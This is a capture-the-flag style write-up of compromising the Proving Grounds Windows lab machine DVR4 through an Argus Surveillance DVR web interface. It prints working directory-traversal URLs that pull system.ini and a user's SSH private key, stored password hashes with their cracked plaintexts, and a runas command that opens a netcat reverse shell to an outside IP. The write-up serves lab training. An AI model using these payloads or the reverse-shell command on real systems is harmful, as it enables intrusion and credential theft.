DVR4

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

• I started with the usual autorecon and got these ports: 22, 135, 139, 445, 5040, 8080, 49664 -> 49669

Service Analysis

• I checked port 8080 and found an interface for Argus Surveillance software, which is used for managing CCTVs. I played around for a while before searching online and finding a directory traversal vulnerability, CVE-2018-15745.

HTTP (8080)

Gaining Initial Access

• Using the PoC, I managed to get files from the system. Since SSH was open and accepted public key authentication, looking for SSH keys would be a good call, but first I needed to know the users. Luckily, in the web interface there was a tab for the users which listed two accounts: Viewer and Administrator.

Users from the System

• I tested the directory traversal on System.ini to validate it was working before starting with the SSH keys:

http://192.168.170.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%Windows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=%22

• Then I used:

http://192.168.170.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=%22

SSH Key

• I was able to retrieve the Viewer’s private key. Using this key, I logged into the system via SSH.

Initial Access

Privilege Escalation

• For privilege escalation, I checked the usual things, privileges, groups, etc. but nothing was found. I couldn’t even run systeminfo since I kept getting "Access Denied."

Systeminfo

• I then reviewed the installed applications and looked for Privilege Escalation CVEs for the Argus Surveillance DVR. I found two options (ExploitDB IDs: 45312 & 50130):

  • DLL Injection: This approach required GCC and write permissions to the program directory, which weren’t available.

  • Password Bruteforce Attack: The PoC indicated that encrypted passwords were stored in: C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

• Navigating to this hidden directory (remember, ProgramData is hidden by default), I found two password hashes:

  • Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8

  • Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE

• Using the provided PoC, I cracked both hashes. One password was "ImwatchingY0u" and the other appeared as "14WatchD0g?", the question mark indicating a missing special character.

First Cracked Password

Second Cracked Password

• I initially tried logging in via SSH with these credentials, but nothing worked.

Trying with SSH

When I first got access, I spwaned a reverse shell. However, the reverse shell session wouldn’t allow me to type the password when using the runas command I don't know why. I resorted to CMD and kept trying with runas

• After several attempts, I discovered that the correct second password was "14WatchD0g$"

runas /user:administrator "c:\users\viewer\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.170 9988"

• This granted me a shell as Administrator.

Lessons Learned

• Directory Traversal: Exploiting traversal vulnerabilities can be invaluable for retrieving sensitive files like SSH keys and configuration files.

• Hidden Directories: Always remember to check hidden directories (like ProgramData) when hunting for credentials.

• Alternate Access Methods: If standard SSH login fails, using a runas command from CMD can work.